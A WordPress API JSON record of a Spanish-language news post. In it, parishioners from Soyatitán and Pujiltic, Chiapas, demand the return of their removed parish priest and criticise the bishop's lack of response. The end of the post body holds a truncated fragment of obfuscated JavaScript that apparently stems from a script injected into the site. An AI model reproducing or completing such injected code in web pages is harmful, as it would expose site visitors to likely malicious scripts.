{"id":5943,"date":"2022-10-19T02:17:31","date_gmt":"2022-10-19T02:17:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5943"},"modified":"2022-10-19T02:17:32","modified_gmt":"2022-10-19T02:17:32","slug":"piden-el-retorno-del-parroco-de-soyatitan","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5943","title":{"rendered":"Piden el retorno del p\u00e1rroco de Soyatit\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"449\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221018-WA0037-1024x449.jpg\" alt=\"\" class=\"wp-image-5944\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221018-WA0037-1024x449.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221018-WA0037-300x132.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221018-WA0037-768x337.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221018-WA0037-1536x674.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221018-WA0037.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d2scar G\u00f2mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.-En conferencia de prensa en la Cruz de la Plaza Catedral de esta ciudad, un grupo de personas encabezados por&nbsp; Martin Espinosa Dom\u00ednguez&nbsp; de la Parroquia de la Asunci\u00f3n de Soyatitan y Pujiltic, denunciaron que les quitado el Parroco Armando Su\u00e1rez D\u00edaz, quien permaneci\u00f3 s\u00f3lamente 3 meses, ya que el pasado domingo fue separado de dicha parroquia sin consultar a los feligreses.<\/p>\n\n\n\n<p>&#8220;No nos dieron ninguna&nbsp;explicaci\u00f3n, simplemente se despidi\u00f3 porque le ped\u00edan&nbsp;que ya no estuviera, lo sacaron, es el p\u00e1rroco que tenemos para Soyatit\u00e1n, Pujiltic, todas las colonias, es el \u00fanico que tenemos. No hay nadie, este domingo lo sacaron&#8221;, dijo Josefa Balinas, una de las feligreses.<\/p>\n\n\n\n<p>Guadalupe Gordillo, originaria de Soyatit\u00e1n, asegur\u00f3 que el Obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Martrinez, tiene conocimiento de los problemas que se viven all\u00e0, y hay documentos desde el 1 de agosto, donde le hab\u00edan planteado, y no quer\u00edan hacerlo p\u00fablico, pero ante la negativa lo tuvieron que hacer.<\/p>\n\n\n\n<p>Indicaron que han perdido un acercamiento con el obispo Rodrigo Aguilar Mart\u00ednez, pero reciben resultados negativos, con el argumento de que su agenda est\u00e1 llena y no los atiende.<\/p>\n\n\n\n<p>Demandan el regreso del padre ya que la feligres\u00eda lo pide, pues en ese lugar existen problemas internos ajenos a la iglesia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d2scar G\u00f2mez\/Corresponsal San Crist\u00f3bal de Las Casas.-En conferencia de prensa en la Cruz de la Plaza Catedral de esta ciudad, un grupo de personas encabezados por&nbsp; Martin Espinosa Dom\u00ednguez&nbsp; de la Parroquia de la Asunci\u00f3n de Soyatitan y Pujiltic, denunciaron que les quitado el Parroco Armando Su\u00e1rez D\u00edaz, quien permaneci\u00f3 s\u00f3lamente 3 meses, ya que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5944,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5943","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5943","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5943"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5943\/revisions"}],"predecessor-version":[{"id":5945,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5943\/revisions\/5945"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5944"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5943"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5943"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5943"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}